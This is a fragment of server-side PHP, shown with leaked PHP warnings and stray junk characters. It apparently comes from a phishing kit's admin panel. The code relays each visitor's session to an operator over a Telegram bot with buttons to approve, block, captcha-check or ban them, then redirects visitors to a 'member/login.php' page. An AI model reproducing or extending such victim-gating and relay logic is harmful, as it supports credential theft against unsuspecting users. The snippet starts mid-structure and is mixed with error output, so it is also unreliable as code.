???
123123123123
.....................................................................................................................................???
123123123123
.....................................................................................................................................
Warning: Undefined variable $auth in /home/elquintoelemento/public_html/admin.php on line 546
Warning: Trying to access array offset on null in /home/elquintoelemento/public_html/admin.php on line 546
Warning: Cannot modify header information - headers already sent by (output started at /home/elquintoelemento/public_html/admin.php:1) in /home/elquintoelemento/public_html/admin.php on line 188
Warning: Cannot modify header information - headers already sent by (output started at /home/elquintoelemento/public_html/admin.php:1) in /home/elquintoelemento/public_html/admin.php on line 189
array(
array(
array('text' => '🔃 Waiting for response...', 'callback_data' => $_SESSION['unique_id'] . ' loading'),
),
),
);
}else{
$buttons = array(
'inline_keyboard' => array(
array(
array('text' => '✅ Approve', 'callback_data' => $_SESSION['unique_id'] . ' approve_access'),
array('text' => '⛔️ Block', 'callback_data' => $_SESSION['unique_id'] . ' block_access'),
),
array(
array('text' => '🤖 Ask to resolve captcha', 'callback_data' => $_SESSION['unique_id'] . ' captcha_check'),
),
array(
array('text' => '🚫 Ban user', 'callback_data' => $_SESSION['unique_id'] . ' ban_user'),
),
),
);
}
$activity['status'] = '🟢';
$activity['step'] = '*️⃣ Action: Please choose a command';
require(__DIR__ . '/includes/php/texts.php');
$status = bot_api('sendMessage', $message, $buttons);
$_SESSION['messageid'] = $status['result']['message_id'];
if ($status['ok'] === 0 || $status['ok'] === false){
die('{"error":true, "description": "telegram bot api"}');
}
$_SESSION['first_access'] = true;
}
if($config['bot_modes'] == 'off'){
header('location: member/login.php');
exit();
}elseif($config['bot_modes'] == 'strict'){
header('location: member/captcha.php');
exit();
}
?>